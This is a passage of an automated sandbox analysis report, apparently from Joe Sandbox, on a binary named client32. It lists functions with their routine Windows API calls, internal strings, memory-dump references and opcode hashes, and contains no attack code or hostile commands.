                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                                                                                                • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                                • API String ID: 2441568934-1875806619
                                                                                                                                                                • Opcode ID: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                                                                                                • Instruction ID: 32575625ee732fca108261b890e952c9fd6c17214e61566243eaf6e55242290c
                                                                                                                                                                • Opcode Fuzzy Hash: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                                                                                                • Instruction Fuzzy Hash: D1F0A0BCE086651BD730DE99BC00FCAB7D05F1434CF050498EA8627682DBBA7549C2E6
                                                                                                                                                                Function 110EF7A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetDeviceCaps.GDI32(?,0000000E), ref: 110EF7B2
                                                                                                                                                                • GetDeviceCaps.GDI32(?,0000000C), ref: 110EF7B9
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CapsDevice$ErrorExitLastMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\CTL32\pcibmp.cpp$nColors
                                                                                                                                                                • API String ID: 2713834284-4292231205
                                                                                                                                                                • Opcode ID: 75b71cda2beea52cdebbc6f16cffef0c1e21f92a9f099c593304bde246b07ca1
                                                                                                                                                                • Instruction ID: e653e105d1db285baf4aee81a270448f5a93b4716bd0762641d67f3d6a1cba1b
                                                                                                                                                                • Opcode Fuzzy Hash: 75b71cda2beea52cdebbc6f16cffef0c1e21f92a9f099c593304bde246b07ca1
                                                                                                                                                                • Instruction Fuzzy Hash: 3CE0D827F4123837F60125FA6C81F86F78C9B857A8F020072FA14BB281D5D16C0046D1
                                                                                                                                                                Function 11061140 Relevance: 6.1, APIs: 4, Instructions: 131registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                                                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                                                                                                • RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 110612C3
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 110612D4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnumValue$CloseOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3785232357-0
                                                                                                                                                                • Opcode ID: 7715bebcec98b19269c8f2ceb66aa64331a88d71416ba02ead887a332bffef31
                                                                                                                                                                • Instruction ID: e119b506798adee895546c353bca4cd72f80153627c59e78ac85c5ed933e93b3
                                                                                                                                                                • Opcode Fuzzy Hash: 7715bebcec98b19269c8f2ceb66aa64331a88d71416ba02ead887a332bffef31
                                                                                                                                                                • Instruction Fuzzy Hash: 14412CB190061E9EDB20CB54CC84FDBBBBDAB89305F0045D9E649D7141EA70AA98CFA0
                                                                                                                                                                Function 11035770 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 11035847
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1103585C
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1103586B
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11035880
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Exception@8Throwstd::exception::exception$_malloc_memsetwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1651403513-0
                                                                                                                                                                • Opcode ID: 6f0e1f36f578e83cd105e85a49ea6b71d0d6b11703bbf157c5e2072aa8e65fab
                                                                                                                                                                • Instruction ID: 68ed5240519e24daba2f358b35ddd0bbb3a90415a2be8f5380ccc9ef311a82ca
                                                                                                                                                                • Opcode Fuzzy Hash: 6f0e1f36f578e83cd105e85a49ea6b71d0d6b11703bbf157c5e2072aa8e65fab
                                                                                                                                                                • Instruction Fuzzy Hash: 1F4139B5D00615EFCB20CF9AC980AEEFBF8FFA8604B10855EE556A7250E7716604CF91
                                                                                                                                                                Function 110291D0 Relevance: 6.1, APIs: 4, Instructions: 104sleepthreadwindowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00001000,11027030,00000000,00000000,111ED468), ref: 110291F3
                                                                                                                                                                • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029212
                                                                                                                                                                • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029234
                                                                                                                                                                • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102923C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: SleepThread$CreateMessagePost
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3347742789-0
                                                                                                                                                                • Opcode ID: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                                                                                                • Instruction ID: 6c329cfe7713c70c74540dd837a6755ec0a493dd99a0e0f492d5b7c5eaff94cf
                                                                                                                                                                • Opcode Fuzzy Hash: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                                                                                                • Instruction Fuzzy Hash: E831D476D42230ABD602DBDCCC80FAABBA8A755758F914134F9395B6C8D6717805CBD0
                                                                                                                                                                Function 110B3230 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(0000002C,59FD48C0,?,?,00000000,00000000,?,Function_00182078,000000FF,?,1103D500,?,?,?,00000000,59FD48C0), ref: 110B325F
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,1103D500,?,?,?,00000000,59FD48C0,?,?,00000000,?,00000015,00000000), ref: 110B329F
                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 110B331A
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B3321
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3394196147-0
                                                                                                                                                                • Opcode ID: fd4f52dacf6346c68deca50a419aba338554c765379c0af81f02942a775e7cd5
                                                                                                                                                                • Instruction ID: 1c2cd706bfc580d94f6c8d94d17799be7df3d247d13d912ddb644fcd1bc25a9e
                                                                                                                                                                • Opcode Fuzzy Hash: fd4f52dacf6346c68deca50a419aba338554c765379c0af81f02942a775e7cd5
                                                                                                                                                                • Instruction Fuzzy Hash: FC310575A04B059FD315CF69C884B9AFBE4FB4C314F10866EE85AC7750EB34A854CB90
                                                                                                                                                                Function 1103F430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,1105D780,00000001,00000000), ref: 1103F503
                                                                                                                                                                  • Part of subcall function 1105C9E0: EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103F515,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105C9FE
                                                                                                                                                                  • Part of subcall function 1105C9E0: LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,59FD48C0), ref: 1105CA7E
                                                                                                                                                                  • Part of subcall function 1105C9E0: SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,59FD48C0), ref: 1105CA88
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$CloseEnterEventHandleLeave__wcstoi64
                                                                                                                                                                • String ID: Client$DisableThumbnail$DisableWatch
                                                                                                                                                                • API String ID: 2471723077-3419801620
                                                                                                                                                                • Opcode ID: 3a08def9015ce182050579bb2c21c5865f3c5c2ea377edc44cec88c632d5218c
                                                                                                                                                                • Instruction ID: 4287aa36ae45ddbffb52a6f4620c4c950a8715c4833b158dbab67a8c3e7a4128
                                                                                                                                                                • Opcode Fuzzy Hash: 3a08def9015ce182050579bb2c21c5865f3c5c2ea377edc44cec88c632d5218c
                                                                                                                                                                • Instruction Fuzzy Hash: 9B21E435E10616AFDB14CF658C44BAFB7A8EB80759F10417AED149B2C0FB30A901CBA2
                                                                                                                                                                Function 110395D0 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 110395F6
                                                                                                                                                                  • Part of subcall function 11026830: GetWindowTextA.USER32(?,?,00000100), ref: 11026853
                                                                                                                                                                  • Part of subcall function 11026830: wvsprintfA.USER32(?,?,?), ref: 1102686B
                                                                                                                                                                  • Part of subcall function 11026830: SetWindowTextA.USER32(?,?), ref: 1102687C
                                                                                                                                                                • _strncpy.LIBCMT ref: 11039625
                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003E9,00000000), ref: 1103967E
                                                                                                                                                                • SetDlgItemTextA.USER32(?,0000046C,11194244), ref: 1103968E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Text$ItemWindow$_memset_strncpywvsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2512952459-0
                                                                                                                                                                • Opcode ID: 0e4aec3191dc9d557d0695a390bb50908f497d0600642de312863fcb6453a126
                                                                                                                                                                • Instruction ID: 11016f44d57e3dbf0621b50850c4c2fcbb07da68c585f74de2534b4cfa95b006
                                                                                                                                                                • Opcode Fuzzy Hash: 0e4aec3191dc9d557d0695a390bb50908f497d0600642de312863fcb6453a126
                                                                                                                                                                • Instruction Fuzzy Hash: 192108F9A10208ABD310DB60CC81EEBB7BCEB84708F004559FB4597581DAB1F954C7A1
                                                                                                                                                                Function 110B3340 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(0000002C,59FD48C0,?,?,00000000,00000000,00000000,Function_00182078,000000FF,?,1103D571,?,59FD48C0,?,?,00000000), ref: 110B336F
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,1103D571,?,59FD48C0,?,?,00000000,?,00000015,00000000), ref: 110B338E
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,1103D571,?,59FD48C0,?,?,00000000,?,00000015,00000000), ref: 110B33D4
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,1103D571,?,59FD48C0,?,?,00000000,?,00000015,00000000), ref: 110B33DB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3394196147-0
                                                                                                                                                                • Opcode ID: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                                                                                                • Instruction ID: 2836c68be1e173ca97a40bbc94208784cbdba460b006acea4806f33579668287
                                                                                                                                                                • Opcode Fuzzy Hash: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                                                                                                • Instruction Fuzzy Hash: 6221DF76A087089FD315CFA8D884B9AF7E8FB4C715F008A2EE816C7640DB79B404CB94
                                                                                                                                                                Function 110494B0 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
